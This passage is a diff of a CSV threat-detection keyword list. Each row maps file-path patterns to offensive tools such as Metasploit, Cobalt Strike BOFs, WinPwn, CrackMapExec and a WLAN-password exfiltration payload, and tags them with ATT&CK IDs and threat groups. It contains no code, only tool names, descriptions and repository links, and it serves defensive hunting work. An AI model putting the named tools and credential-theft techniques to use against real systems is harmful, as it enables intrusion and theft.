Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" "*/win/Tor/tor.exe*","offensive_tool_keyword","Tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Defense Evasion - Data Exfiltration","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","2","148","44","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z" -"*/Win7ElevateDll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/WinBruteLogon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" -"*/win-brute-logon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1026","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/Win7ElevateDll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/WinBruteLogon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" +"*/win-brute-logon*","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","10","1027","184","2022-12-27T12:06:40Z","2020-05-14T21:46:50Z" "*/windapsearch.git*","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","AD Enumeration","https://github.com/ropnop/windapsearch","1","1","N/A","N/A","7","666","134","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z" -"*/windapsearch_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" 
-"*/windows/dcerpc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/windows_autologin.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/windapsearch_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/windows/dcerpc*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/windows_autologin.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/windows-login-phish*","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows maching login page designed using HTML CSS and JS. 
This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","1","17","5","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z" -"*/windows-lpe-template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*/windows-lpe-template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. 
and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Windows-Passwords.ps1*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" "*/windows-resources/hyperion*","offensive_tool_keyword","hyperion","A runtime PE-Crypter - The crypter is started via the command line and encrypts an input executable with AES-128. 
The encrypted file decrypts itself on startup (bruteforcing the AES key which may take a few seconds)","T1027.002 - T1059.001 - T1116","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://www.kali.org/tools/hyperion/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" -"*/WindowsVault.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/WindowsVault.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" -"*/win-enum-resources*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/WinPwn*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*/WinPwn.git*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*/WinPwn_Repo*","offensive_tool_keyword","WinPwn","Automation for internal Windows 
Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2960","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" -"*/WinPwnage*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" -"*/winregistry.py**","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/WindowsVault.cna*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/WindowsVault.h*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","1","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"*/win-enum-resources*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/WinPwn*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn.git*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwn_Repo*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/WinPwnage*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/winregistry.py**","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" "*/winrm.cpp*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 
- T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" -"*/winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*/winrm.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "*/winrmdll*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" "*/winrm-reflective-dll/*","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mez-0/winrmdll","1","1","N/A","10","10","138","27","2021-09-11T13:44:16Z","2021-09-11T13:40:22Z" -"*/Winsocky.git*","offensive_tool_keyword","cobaltstrike","Winsocket for Cobalt Strike.","T1572 - T1041 - T1105","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/WKL-Sec/Winsocky","1","1","N/A","10","10","79","13","2023-07-06T11:47:18Z","2023-06-22T07:00:22Z" +"*/winscp_dump.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - 